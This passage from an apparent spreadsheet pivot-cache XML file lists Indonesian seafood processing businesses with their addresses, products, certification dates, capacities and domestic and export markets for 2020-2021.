    <s v="PT. TRIDAYA JAYA MANUNGGAL"/>
    <s v="Jl. Rembang Industri Raya No. 36 PIER, Kel. Rembang, Kec. Rembang, Kabupaten Pasuruan&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Tuna Beku"/>
    <d v="2020-11-20T00:00:00"/>
    <n v="45200"/>
    <m/>
    <s v="Netherlands"/>
  </r>
  <r>
    <n v="22427"/>
    <x v="688"/>
    <s v="PT. TRIDAYA JAYA MANUNGGAL"/>
    <s v="Jl. Rembang Industri Raya No. 36 PIER, Kel. Rembang, Kec. Rembang, Kabupaten Pasuruan&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Ikan Hasil Budidaya Beku (Lele, Bandeng)"/>
    <d v="2020-11-20T00:00:00"/>
    <n v="6340"/>
    <m/>
    <s v="Sri Lanka"/>
  </r>
  <r>
    <n v="22434"/>
    <x v="301"/>
    <s v="CV. SEA MALAKA TRADE"/>
    <s v="Jl. Ampera Dusun V, Kel. Bagan Asahan Pekan, Kec. Tanjung Balai, Kabupaten Asahan&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Udang Segar"/>
    <d v="2020-11-02T00:00:00"/>
    <n v="10000"/>
    <s v="Kota Medan"/>
    <s v="Malaysia"/>
  </r>
  <r>
    <n v="22435"/>
    <x v="301"/>
    <s v="CV. SEA MALAKA TRADE"/>
    <s v="Jl. Ampera Dusun V, Kel. Bagan Asahan Pekan, Kec. Tanjung Balai, Kabupaten Asahan&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Cephalopoda Segar (Sotong, Gurita, Cumi-cumi)"/>
    <d v="2020-11-02T00:00:00"/>
    <n v="5000"/>
    <s v="Kota Medan"/>
    <s v="Malaysia"/>
  </r>
  <r>
    <n v="22436"/>
    <x v="301"/>
    <s v="CV. SEA MALAKA TRADE"/>
    <s v="Jl. Ampera Dusun V, Kel. Bagan Asahan Pekan, Kec. Tanjung Balai, Kabupaten Asahan&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Kerang Segar"/>
    <d v="2020-11-02T00:00:00"/>
    <n v="15000"/>
    <s v="Kota Medan"/>
    <s v="Malaysia"/>
  </r>
  <r>
    <n v="22437"/>
    <x v="301"/>
    <s v="CV. SEA MALAKA TRADE"/>
    <s v="Jl. Ampera Dusun V, Kel. Bagan Asahan Pekan, Kec. Tanjung Balai, Kabupaten Asahan&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Kepiting Segar"/>
    <d v="2020-11-02T00:00:00"/>
    <n v="10000"/>
    <s v="Kota Medan"/>
    <s v="Malaysia"/>
  </r>
  <r>
    <n v="22438"/>
    <x v="658"/>
    <s v="SEMANGAT BARU"/>
    <s v="Jl. Garuda LK IV, Kel. Beting Kuala Kapias, Kec. Teluk Nibung, Kota Tanjung Balai&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Udang Segar"/>
    <d v="2020-10-02T00:00:00"/>
    <n v="200000"/>
    <s v="Kota Medan"/>
    <s v="China, Malaysia"/>
  </r>
  <r>
    <n v="22439"/>
    <x v="658"/>
    <s v="SEMANGAT BARU"/>
    <s v="Jl. Garuda LK IV, Kel. Beting Kuala Kapias, Kec. Teluk Nibung, Kota Tanjung Balai&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Kepiting Segar"/>
    <d v="2020-10-02T00:00:00"/>
    <n v="200000"/>
    <s v="Kota Medan"/>
    <s v="China, Malaysia"/>
  </r>
  <r>
    <n v="22440"/>
    <x v="658"/>
    <s v="SEMANGAT BARU"/>
    <s v="Jl. Garuda LK IV, Kel. Beting Kuala Kapias, Kec. Teluk Nibung, Kota Tanjung Balai&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Kerang Segar"/>
    <d v="2020-10-02T00:00:00"/>
    <n v="200000"/>
    <s v="Kota Medan"/>
    <s v="China, Malaysia"/>
  </r>
  <r>
    <n v="22441"/>
    <x v="658"/>
    <s v="SEMANGAT BARU"/>
    <s v="Jl. Garuda LK IV, Kel. Beting Kuala Kapias, Kec. Teluk Nibung, Kota Tanjung Balai&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Cephalopoda Segar (Sotong, Gurita, Cumi-cumi)"/>
    <d v="2020-10-02T00:00:00"/>
    <n v="200000"/>
    <s v="Kota Medan"/>
    <s v="China, Malaysia"/>
  </r>
  <r>
    <n v="22442"/>
    <x v="658"/>
    <s v="SEMANGAT BARU"/>
    <s v="Jl. Garuda LK IV, Kel. Beting Kuala Kapias, Kec. Teluk Nibung, Kota Tanjung Balai&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Ikan Pelagis Segar (Layur, Kembung, Tenggiri, Selayar)"/>
    <d v="2020-10-02T00:00:00"/>
    <n v="200000"/>
    <s v="Kota Medan"/>
    <s v="China, Malaysia"/>
  </r>
  <r>
    <n v="22443"/>
    <x v="658"/>
    <s v="SEMANGAT BARU"/>
    <s v="Jl. Garuda LK IV, Kel. Beting Kuala Kapias, Kec. Teluk Nibung, Kota Tanjung Balai&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Ikan Demersal Segar (Kerapu, Jenaha, Samge, Terisi)"/>
    <d v="2020-10-02T00:00:00"/>
    <n v="200000"/>
    <s v="Kota Medan"/>
    <s v="China, Malaysia"/>
  </r>
  <r>
    <n v="22444"/>
    <x v="689"/>
    <s v="PT. MAHARANI ARTHA PRIMA"/>
    <s v="Jl. Palsigunung RT 003 RW 002, Kel. Mekarsari, Kec. Cimangis, Kota Depok&lt;br&gt;Jawa Barat"/>
    <n v="13"/>
    <s v="Gelembung Ikan Kering"/>
    <d v="2021-07-01T00:00:00"/>
    <n v="200000"/>
    <s v="Kota Jakarta Utara"/>
    <s v="China, Taiwan, Province of China, Viet Nam"/>
  </r>
  <r>
    <n v="22445"/>
    <x v="690"/>
    <s v="PT, JIREH COMMODITY"/>
    <s v="Jl, Kima Raya 2 Komplek Kima Square Warehouse 2 Unit No,11,12,13, Kel, Daya, Kec, Biringkanaya, Kota Makassar&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Telur Ikan Terbang Kering"/>
    <d v="2020-11-09T00:00:00"/>
    <n v="150000"/>
    <s v="Kota Jakarta Timur"/>
    <s v="Canada, China, Hong Kong, Japan, Korea, Democratic People's Republic of, Taiwan, Province of China"/>
  </r>
  <r>
    <n v="22446"/>
    <x v="690"/>
    <s v="PT. JIREH COMMODITY"/>
    <s v="Jl. Kima Raya 2 Komplek Kima Square Warehouse 2 Unit No.11,12,13, Kel. Daya, Kec. Biringkanaya, Kota Makassar&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Telur Ikan Terbang Beku"/>
    <d v="2020-11-09T00:00:00"/>
    <n v="150000"/>
    <s v="Kota Jakarta Timur"/>
    <s v="Canada, China, Hong Kong, Japan, Korea, Democratic People's Republic of, Taiwan, Province of China"/>
  </r>
  <r>
    <n v="22447"/>
    <x v="691"/>
    <s v="PT. SAMUDRA MANDIRI SENTOSA"/>
    <s v="Jl. Wolter Mongisidi Km 5, Kel. Wangurer, Kec. Madidir, Kota Bitung&lt;br&gt;Sulawesi Utara"/>
    <n v="29"/>
    <s v="Tuna Beku"/>
    <d v="2020-10-22T00:00:00"/>
    <n v="3000000"/>
    <m/>
    <s v="China, Germany, Japan, Korea, Democratic People's Republic of, Spain, Taiwan, Province of China, Thailand, United Kingdom, United States"/>
  </r>
  <r>
    <n v="22449"/>
    <x v="195"/>
    <s v="PT. YAKIN PASIFIK TUNA"/>
    <s v="Komplek Pelabuhan Perikanan Samudera Lampulo, Jl. Sisingamangaraja Ujung, Kel. Lampulo, Kec. Kuta Alam, Kota Banda Aceh&lt;br&gt;Aceh"/>
    <n v="1"/>
    <s v="Ikan Demersal Segar (Swanggi, Sebelah, Manyung, Kerapu, Layur, Bawal, Kakap)"/>
    <d v="2020-11-04T00:00:00"/>
    <n v="0"/>
    <s v="Kota Medan, Kota Jambi, Kota Surabaya"/>
    <s v="Brunei Darussalam, Japan"/>
  </r>
  <r>
    <n v="22450"/>
    <x v="692"/>
    <s v="PT. PERIKANAN NUSANTARA (PERSERO) CABANG BITUNG"/>
    <s v="Jl. Samuel Languyu, Kel. Aertembaga Satu, Kec. Aertembaga, Kota Bitung&lt;br&gt;Sulawesi Utara"/>
    <n v="29"/>
    <s v="Ikan Pelagis Segar (Baby Tuna, Selar, Layang, Cakalang)"/>
    <d v="2021-01-22T00:00:00"/>
    <n v="100000"/>
    <s v="Kota Bitung"/>
    <m/>
  </r>
  <r>
    <n v="22451"/>
    <x v="692"/>
    <s v="PT. PERIKANAN NUSANTARA (PERSERO) CABANG BITUNG"/>
    <s v="Jl. Samuel Languyu, Kel. Aertembaga Satu, Kec. Aertembaga, Kota Bitung&lt;br&gt;Sulawesi Utara"/>
    <n v="29"/>
    <s v="Ikan Pelagis Beku (Baby Tuna, Selar, Layang, Cakalang)"/>
    <d v="2021-01-22T00:00:00"/>
    <n v="100000"/>
    <s v="Kota Jakarta Pusat"/>
    <m/>
  </r>
  <r>
    <n v="22452"/>
    <x v="692"/>
    <s v="PT. PERIKANAN NUSANTARA (PERSERO) CABANG BITUNG"/>
    <s v="Jl. Samuel Languyu, Kel. Aertembaga Satu, Kec. Aertembaga, Kota Bitung&lt;br&gt;Sulawesi Utara"/>
    <n v="29"/>
    <s v="Tuna Segar"/>
    <d v="2021-01-22T00:00:00"/>
    <n v="200"/>
    <s v="Kota Jakarta Pusat"/>
    <m/>
  </r>
  <r>
    <n v="22453"/>
    <x v="692"/>
    <s v="PT. PERIKANAN NUSANTARA (PERSERO) CABANG BITUNG"/>
    <s v="Jl. Samuel Languyu, Kel. Aertembaga Satu, Kec. Aertembaga, Kota Bitung&lt;br&gt;Sulawesi Utara"/>
    <n v="29"/>
    <s v="Tuna Beku"/>
    <d v="2021-01-22T00:00:00"/>
    <n v="200"/>
    <s v="Kota Jakarta Pusat"/>
    <m/>
  </r>
  <r>
    <n v="22454"/>
    <x v="95"/>
    <s v="PT. BLUESEA SEAFOOD INDUSTRY"/>
    <s v="Jl. Blanak No.1 Blok B1 No.19 Kawasan Pelabuhan Perikanan Pantai Tegalsari, Kel. Tegalsari, Kec. Tegal Barat, Kota Tegal&lt;br&gt;Jawa Tengah"/>
    <n v="14"/>
    <s v="Udang Beku"/>
    <d v="2020-09-28T00:00:00"/>
    <n v="50000"/>
    <m/>
    <s v="China, Korea, Democratic People's Republic of, Philippines, Thailand"/>
  </r>
  <r>
    <n v="22455"/>
    <x v="95"/>
    <s v="PT. BLUESEA SEAFOOD INDUSTRY"/>
    <s v="Jl. Blanak No.1 Blok B1 No.19 Kawasan Pelabuhan Perikanan Pantai Tegalsari, Kel. Tegalsari, Kec. Tegal Barat, Kota Tegal&lt;br&gt;Jawa Tengah"/>
    <n v="14"/>
    <s v="Rajungan Beku"/>
    <d v="2020-09-28T00:00:00"/>
    <n v="50000"/>
    <m/>
    <s v="China, Korea, Democratic People's Republic of, Philippines, Thailand"/>
  </r>
  <r>
    <n v="22456"/>
    <x v="169"/>
    <s v="CV. GIOVANNI SUKSES MAKMUR"/>
    <s v="Jl. Berbek Industri 5 No. 1, Kel. Berbek, Kec. Waru, Kabupaten Sidoarjo&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Kerang Rebus Beku"/>
    <d v="2020-09-16T00:00:00"/>
    <n v="500"/>
    <m/>
    <s v="Korea, Democratic People's Republic of, Netherlands, United States"/>
  </r>
  <r>
    <n v="22457"/>
    <x v="296"/>
    <s v="PT. SUMBER SAMUDERA INDONESIA"/>
    <s v="Kawasan Industri Terboyo Blok F No.16A, Kel. Trimulyo, Kec. Genuk, Kota Semarang&lt;br&gt;Jawa Tengah"/>
    <n v="14"/>
    <s v="Ikan Demersal Beku (Kakap Putih, Gulama, Lencam, Kerapu, Layur, Kakatua, Bawal, Kaca Piring, Kuro, Kurisi)"/>
    <d v="2020-12-23T00:00:00"/>
    <n v="200000"/>
    <m/>
    <s v="China, Malaysia, Philippines, Singapore, Thailand"/>
  </r>
  <r>
    <n v="22458"/>
    <x v="296"/>
    <s v="PT. SUMBER SAMUDERA INDONESIA"/>
    <s v="Kawasan Industri Terboyo Blok F No.16A, Kel. Trimulyo, Kec. Genuk, Kota Semarang&lt;br&gt;Jawa Tengah"/>
    <n v="14"/>
    <s v="Ikan Pelagis Beku (Tongkol, Kembung, Lemadang, Cakalang, Tenggiri)"/>
    <d v="2020-12-23T00:00:00"/>
    <n v="200000"/>
    <m/>
    <s v="China, Malaysia, Philippines, Singapore, Thailand"/>
  </r>
  <r>
    <n v="22459"/>
    <x v="296"/>
    <s v="PT. SUMBER SAMUDERA INDONESIA"/>
    <s v="Kawasan Industri Terboyo Blok F No.16A, Kel. Trimulyo, Kec. Genuk, Kota Semarang&lt;br&gt;Jawa Tengah"/>
    <n v="14"/>
    <s v="Cephalopoda Beku (Sotong, Gurita, Cumi-cumi)"/>
    <d v="2020-12-23T00:00:00"/>
    <n v="50000"/>
    <m/>
    <s v="China, Malaysia, Philippines, Singapore, Thailand"/>
  </r>
  <r>
    <n v="22460"/>
    <x v="296"/>
    <s v="PT. SUMBER SAMUDERA INDONESIA"/>
    <s v="Kawasan Industri Terboyo Blok F No.16A, Kel. Trimulyo, Kec. Genuk, Kota Semarang&lt;br&gt;Jawa Tengah"/>
    <n v="14"/>
    <s v="Kepiting Beku"/>
    <d v="2020-12-23T00:00:00"/>
    <n v="50000"/>
    <m/>
    <s v="China, Malaysia, Philippines, Singapore, Thailand"/>
  </r>
  <r>
    <n v="22461"/>
    <x v="296"/>
    <s v="PT. SUMBER SAMUDERA INDONESIA"/>
    <s v="Kawasan Industri Terboyo Blok F No.16A, Kel. Trimulyo, Kec. Genuk, Kota Semarang&lt;br&gt;Jawa Tengah"/>
    <n v="14"/>
    <s v="Tuna Beku"/>
    <d v="2020-12-23T00:00:00"/>
    <n v="150000"/>
    <m/>
    <s v="China"/>
  </r>
  <r>
    <n v="22462"/>
    <x v="296"/>
    <s v="PT. SUMBER SAMUDERA INDONESIA"/>
    <s v="Kawasan Industri Terboyo Blok F No.16A, Kel. Trimulyo, Kec. Genuk, Kota Semarang&lt;br&gt;Jawa Tengah"/>
    <n v="14"/>
    <s v="Tuna Loin Beku"/>
    <d v="2020-12-23T00:00:00"/>
    <n v="95000"/>
    <m/>
    <s v="China"/>
  </r>
  <r>
    <n v="22463"/>
    <x v="296"/>
    <s v="PT. SUMBER SAMUDERA INDONESIA"/>
    <s v="Kawasan Industri Terboyo Blok F No.16A, Kel. Trimulyo, Kec. Genuk, Kota Semarang&lt;br&gt;Jawa Tengah"/>
    <n v="14"/>
    <s v="Kerang Beku"/>
    <d v="2020-12-23T00:00:00"/>
    <n v="100000"/>
    <m/>
    <s v="China, Malaysia, Philippines, Singapore, Thailand"/>
  </r>
  <r>
    <n v="22464"/>
    <x v="296"/>
    <s v="PT. SUMBER SAMUDERA INDONESIA"/>
    <s v="Kawasan Industri Terboyo Blok F No.16A, Kel. Trimulyo, Kec. Genuk, Kota Semarang&lt;br&gt;Jawa Tengah"/>
    <n v="14"/>
    <s v="Sidat Beku"/>
    <d v="2020-12-23T00:00:00"/>
    <n v="10000"/>
    <m/>
    <s v="China, Malaysia, Philippines, Singapore, Thailand"/>
  </r>
  <r>
    <n v="22465"/>
    <x v="296"/>
    <s v="PT. SUMBER SAMUDERA INDONESIA"/>
    <s v="Kawasan Industri Terboyo Blok F No.16A, Kel. Trimulyo, Kec. Genuk, Kota Semarang&lt;br&gt;Jawa Tengah"/>
    <n v="14"/>
    <s v="Udang Beku"/>
    <d v="2020-12-23T00:00:00"/>
    <n v="80000"/>
    <m/>
    <s v="China, Malaysia, Philippines, Singapore, Thailand"/>
  </r>
  <r>
    <n v="22466"/>
    <x v="296"/>
    <s v="PT. SUMBER SAMUDERA INDONESIA"/>
    <s v="Kawasan Industri Terboyo Blok F No.16A, Kel. Trimulyo, Kec. Genuk, Kota Semarang&lt;br&gt;Jawa Tengah"/>
    <n v="14"/>
    <s v="Hiu Beku"/>
    <d v="2020-12-23T00:00:00"/>
    <n v="0"/>
    <m/>
    <s v="China"/>
  </r>
  <r>
    <n v="22467"/>
    <x v="296"/>
    <s v="PT. SUMBER SAMUDERA INDONESIA"/>
    <s v="Kawasan Industri Terboyo Blok F No.16A, Kel. Trimulyo, Kec. Genuk, Kota Semarang&lt;br&gt;Jawa Tengah"/>
    <n v="14"/>
    <s v="Keong Beku"/>
    <d v="2020-12-23T00:00:00"/>
    <n v="5000"/>
    <m/>
    <s v="China"/>
  </r>
  <r>
    <n v="22468"/>
    <x v="296"/>
    <s v="PT. SUMBER SAMUDERA INDONESIA"/>
    <s v="Kawasan Industri Terboyo Blok F No.16A, Kel. Trimulyo, Kec. Genuk, Kota Semarang&lt;br&gt;Jawa Tengah"/>
    <n v="14"/>
    <s v="Lobster Beku"/>
    <d v="2020-12-23T00:00:00"/>
    <n v="0"/>
    <m/>
    <s v="China"/>
  </r>
  <r>
    <n v="22469"/>
    <x v="693"/>
    <s v="PT. SELT ALGA INDONESIA"/>
    <s v="Green Sedayu Biz Park Cakung Blok GS-06 No.38 RT 011 RW 006, Kel. Cakung Timur, Kec. Cakung, Kota Jakarta Timur&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Rumput Laut Kering"/>
    <d v="2020-12-03T00:00:00"/>
    <n v="120000"/>
    <m/>
    <s v="Tunisia"/>
  </r>
  <r>
    <n v="22470"/>
    <x v="694"/>
    <s v="PT. SIG ASIA"/>
    <s v="Jl. Lumba-lumba Lingkungan IV,  RT 001 RW 004, Kel. Girian Bawah, Kec. Girian, Kota Bitung&lt;br&gt;Sulawesi Utara"/>
    <n v="29"/>
    <s v="Tuna Segar"/>
    <d v="2020-09-29T00:00:00"/>
    <n v="3756000"/>
    <s v="Kota Jakarta Barat"/>
    <s v="China, Japan, Korea, Democratic People's Republic of, Singapore, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="22471"/>
    <x v="694"/>
    <s v="PT. SIG ASIA"/>
    <s v="Jl. Lumba-lumba Lingkungan IV,  RT 001 RW 004, Kel. Girian Bawah, Kec. Girian, Kota Bitung&lt;br&gt;Sulawesi Utara"/>
    <n v="29"/>
    <s v="Tuna Beku"/>
    <d v="2020-09-29T00:00:00"/>
    <n v="2253000"/>
    <s v="Kota Jakarta Barat"/>
    <s v="Australia, China, Japan, Korea, Democratic People's Republic of, Singapore, Thailand, United States, Viet Nam"/>
  </r>
  <r>
    <n v="22472"/>
    <x v="694"/>
    <s v="PT. SIG ASIA"/>
    <s v="Jl. Lumba-lumba Lingkungan IV,  RT 001 RW 004, Kel. Girian Bawah, Kec. Girian, Kota Bitung&lt;br&gt;Sulawesi Utara"/>
    <n v="29"/>
    <s v="Ikan Pelagis Beku (Marlin, Gindara, Cakalang, Pedang)"/>
    <d v="2020-09-29T00:00:00"/>
    <n v="30000"/>
    <m/>
    <s v="Singapore"/>
  </r>
  <r>
    <n v="22473"/>
    <x v="694"/>
    <s v="PT. SIG ASIA"/>
    <s v="Jl. Lumba-lumba Lingkungan IV,  RT 001 RW 004, Kel. Girian Bawah, Kec. Girian, Kota Bitung&lt;br&gt;Sulawesi Utara"/>
    <n v="29"/>
    <s v="Cephalopoda Beku (Sotong, Gurita, Cumi-cumi)"/>
    <d v="2020-09-29T00:00:00"/>
    <n v="10000"/>
    <m/>
    <s v="Korea, Democratic People's Republic of"/>
  </r>
  <r>
    <n v="22474"/>
    <x v="695"/>
    <s v="UD. ALAM BIRU INDAH"/>
    <s v="Jl. Brigjen Zein Hamid Komp. Citra Baru No.39, Kel. Titi Kuning, Kec. Medan Johor, Kota Medan&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Teripang Kering"/>
    <d v="2020-12-11T00:00:00"/>
    <n v="3000"/>
    <s v="Kota Jakarta Barat"/>
    <s v="Hong Kong, Malaysia, Singapore"/>
  </r>
  <r>
    <n v="22475"/>
    <x v="695"/>
    <s v="UD. ALAM BIRU INDAH"/>
    <s v="Jl. Brigjen Zein Hamid Komp. Citra Baru No.39, Kel. Titi Kuning, Kec. Medan Johor, Kota Medan&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Perut Ikan Kering"/>
    <d v="2020-12-11T00:00:00"/>
    <n v="500"/>
    <s v="Kota Jakarta Barat, Kota Surabaya"/>
    <s v="Malaysia, Singapore"/>
  </r>
  <r>
    <n v="22476"/>
    <x v="695"/>
    <s v="UD. ALAM BIRU INDAH"/>
    <s v="Jl. Brigjen Zein Hamid Komp. Citra Baru No.39, Kel. Titi Kuning, Kec. Medan Johor, Kota Medan&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Sirip Hiu Kering"/>
    <d v="2020-12-11T00:00:00"/>
    <n v="2500"/>
    <s v="Kota Jakarta Barat, Kota Surabaya"/>
    <s v="Malaysia, Singapore"/>
  </r>
  <r>
    <n v="22477"/>
    <x v="695"/>
    <s v="UD. ALAM BIRU INDAH"/>
    <s v="Jl. Brigjen Zein Hamid Komp. Citra Baru No.39, Kel. Titi Kuning, Kec. Medan Johor, Kota Medan&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Tulang Ikan Kering, Kulit Ikan Kering"/>
    <d v="2020-12-11T00:00:00"/>
    <n v="10000"/>
    <s v="Kota Jakarta Barat, Kota Surabaya"/>
    <s v="Malaysia, Singapore"/>
  </r>
  <r>
    <n v="22478"/>
    <x v="684"/>
    <s v="PT. GRAND MULTI CHEMICAL"/>
    <s v="Kawasan Industri dan Pergudangan Cikupamas Jl. Bhumimas VIIII No.7, Kel. Talaga, Kec. Cikupa, Kabupaten Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Nori"/>
    <d v="2020-10-22T00:00:00"/>
    <n v="10000"/>
    <s v="Kota Jakarta Timur"/>
    <m/>
  </r>
  <r>
    <n v="22479"/>
    <x v="595"/>
    <s v="PT. MALUKU PRIMA SUKSES"/>
    <s v="Jl. Trans, Desa Ureng, Kec. Leihitu, Kabupaten Maluku Tengah&lt;br&gt;Maluku"/>
    <n v="31"/>
    <s v="Ikan Pelagis Segar (Tongkol, Kembung, Marlin, Layaran, Layang, Cakalang)"/>
    <d v="2020-09-24T00:00:00"/>
    <n v="150000"/>
    <s v="Kota Surabaya"/>
    <m/>
  </r>
  <r>
    <n v="22480"/>
    <x v="595"/>
    <s v="PT. MALUKU PRIMA SUKSES"/>
    <s v="Jl. Trans, Desa Ureng, Kec. Leihitu, Kabupaten Maluku Tengah&lt;br&gt;Maluku"/>
    <n v="31"/>
    <s v="Tuna Beku"/>
    <d v="2020-09-24T00:00:00"/>
    <n v="60000"/>
    <m/>
    <s v="United States"/>
  </r>
  <r>
    <n v="22481"/>
    <x v="696"/>
    <s v="PT. GALIC BINA MADA"/>
    <s v="Jl. Inspeksi Kalimalang RT 002 RW 001, Kel. Sukadanau, Kec. Cikarang Barat, Kabupaten Bekasi&lt;br&gt;Jawa Barat"/>
    <n v="12"/>
    <s v="Refined Carrageenan"/>
    <d v="2020-12-23T00:00:00"/>
    <n v="200000"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kabupaten Bandung, Kabupaten Bandung Barat, Kota Bandung, Kabupaten Semarang, Kota Semarang, Kota Surabaya, Kabupaten Tangerang, Kota Tangerang, Kota Tangerang Selatan"/>
    <m/>
  </r>
  <r>
    <n v="22482"/>
    <x v="697"/>
    <s v="PT. SARANA INDOGUNA LESTARI"/>
    <s v="Jl. Raya Lontar No. 216, Kel. Lontar, Kec. Sambikerep, Kota Surabaya&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Fillet Patin Beku"/>
    <d v="2020-10-12T00:00:00"/>
    <n v="1000"/>
    <s v="Kabupaten Malang, Kabupaten Sidoarjo, Kabupaten Gresik, Kota Malang, Kota Surabaya, Kota Batu"/>
    <m/>
  </r>
  <r>
    <n v="22501"/>
    <x v="698"/>
    <s v="CV. USAHA MANDIRI"/>
    <s v="Jl. Polos Salok Api RT 02, Kel. Salok Api Laut, Kec. Samboja, Kabupaten Kutai Kartanegara&lt;br&gt;Kalimantan Timur"/>
    <n v="23"/>
    <s v="Kepiting Soka Beku"/>
    <d v="2020-09-24T00:00:00"/>
    <n v="36000"/>
    <m/>
    <s v="Singapore"/>
  </r>
  <r>
    <n v="22502"/>
    <x v="698"/>
    <s v="CV. USAHA MANDIRI"/>
    <s v="Jl. Polos Salok Api RT 02, Kel. Salok Api Laut, Kec. Samboja, Kabupaten Kutai Kartanegara&lt;br&gt;Kalimantan Timur"/>
    <n v="23"/>
    <s v="Daging Kerang Beku"/>
    <d v="2020-09-24T00:00:00"/>
    <n v="12000"/>
    <m/>
    <s v="Singapore"/>
  </r>
  <r>
    <n v="22504"/>
    <x v="95"/>
    <s v="PT. BLUESEA SEAFOOD INDUSTRY"/>
    <s v="Jl. Blanak No.1 Blok B1 No.19 Kawasan Pelabuhan Perikanan Pantai Tegalsari, Kel. Tegalsari, Kec. Tegal Barat, Kota Tegal&lt;br&gt;Jawa Tengah"/>
    <n v="14"/>
    <s v="Daging Abalone Rebus Beku"/>
    <d v="2020-09-28T00:00:00"/>
    <n v="50000"/>
    <m/>
    <s v="China, Korea, Democratic People's Republic of, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="22505"/>
    <x v="699"/>
    <s v="PT. PAN PUTRA SAMUDRA"/>
    <s v="Jl. Raya Rembang - Tuban Km 32, Desa Sumurtawang, Kec. Kragan, Kabupaten Rembang&lt;br&gt;Jawa Tengah"/>
    <n v="14"/>
    <s v="Daging Rajungan Pasteurisasi"/>
    <d v="2020-11-17T00:00:00"/>
    <n v="300000"/>
    <s v="Kota Jakarta Utara"/>
    <s v="United States"/>
  </r>
  <r>
    <n v="22506"/>
    <x v="699"/>
    <s v="PT. PAN PUTRA SAMUDRA"/>
    <s v="Jl. Raya Rembang - Tuban Km 32, Desa Sumurtawang, Kec. Kragan, Kabupaten Rembang&lt;br&gt;Jawa Tengah"/>
    <n v="14"/>
    <s v="Cephalopoda Beku (Cumi-cumi)"/>
    <d v="2020-11-17T00:00:00"/>
    <n v="300000"/>
    <s v="Kota Denpasar"/>
    <s v="Hong Kong"/>
  </r>
  <r>
    <n v="22507"/>
    <x v="699"/>
    <s v="PT. PAN PUTRA SAMUDRA"/>
    <s v="Jl. Raya Rembang - Tuban Km 32, Desa Sumurtawang, Kec. Kragan, Kabupaten Rembang&lt;br&gt;Jawa Tengah"/>
    <n v="14"/>
    <s v="Ikan Pelagis Beku (Tongkol, Lemadang, Layang, Cakalang, Tenggiri)"/>
    <d v="2020-11-17T00:00:00"/>
    <n v="15000"/>
    <s v="Kota Denpasar"/>
    <m/>
  </r>
  <r>
    <n v="22508"/>
    <x v="699"/>
    <s v="PT. PAN PUTRA SAMUDRA"/>
    <s v="Jl. Raya Rembang - Tuban Km 32, Desa Sumurtawang, Kec. Kragan, Kabupaten Rembang&lt;br&gt;Jawa Tengah"/>
    <n v="14"/>
    <s v="Ikan Demersal Beku (Swanggi, Gulama, Manyung, Kerapu, Layur, Bawal, Kakap, Kurisi)"/>
    <d v="2020-11-17T00:00:00"/>
    <n v="15000"/>
    <s v="Kota Jakarta Utara"/>
    <m/>
  </r>
  <r>
    <n v="22520"/>
    <x v="179"/>
    <s v="PT, GEMA ISTA RAYA"/>
    <s v="Jl, Tembero No,17, Kel, Tanggulangin, Kec, Kejayan, Kabupaten Pasuruan&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Sarden Kaleng, Makerel Kaleng"/>
    <d v="2020-12-28T00:00:00"/>
    <n v="4786880"/>
    <s v="Kota Pekanbaru, Kota Palembang"/>
    <s v="Angola, Congo, Ghana, Nigeria, Singapore, Thailand"/>
  </r>
  <r>
    <n v="22521"/>
    <x v="179"/>
    <s v="PT, GEMA ISTA RAYA"/>
    <s v="Jl, Tembero No,17, Kel, Tanggulangin, Kec, Kejayan, Kabupaten Pasuruan&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Tuna Kaleng"/>
    <d v="2020-12-28T00:00:00"/>
    <n v="630000"/>
    <s v="Kota Pekanbaru, Kota Jakarta Pusat, Kota Banjarmasin"/>
    <s v="Ghana, Saudi Arabia, Thailand, United Arab Emirates"/>
  </r>
  <r>
    <n v="22522"/>
    <x v="179"/>
    <s v="PT. GEMA ISTA RAYA"/>
    <s v="Jl. Tembero No.17, Kel. Tanggulangin, Kec. Kejayan, Kabupaten Pasuruan&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Bekicot Kaleng"/>
    <d v="2020-12-28T00:00:00"/>
    <n v="3500"/>
    <s v="Kota Pekanbaru, Kota Banjarmasin"/>
    <m/>
  </r>
  <r>
    <n v="22523"/>
    <x v="700"/>
    <s v="PT. PUTRA CITRA HASIL LAUT"/>
    <s v="Jl. Blanak Blok A No.10, Komplek Pelabuhan PPP Tegalsari, Kel. Tegalsari, Kec. Tegal Barat, Kota Tegal&lt;br&gt;Jawa Tengah"/>
    <n v="14"/>
    <s v="Ikan Demersal Beku (Lencam, Kerapu, Layur, Kakatua, Bawal, Kakap, Baronang, Kurisi)"/>
    <d v="2021-03-04T00:00:00"/>
    <n v="1000000"/>
    <s v="Kota Jakarta Utara, Kota Cirebon, Kabupaten Pati, Kabupaten Kendal, Kabupaten Batang, Kabupaten Tegal, Kota Semarang, Kota Pekalongan, Kota Tegal, Kota Yogyakarta, Kota Surabaya"/>
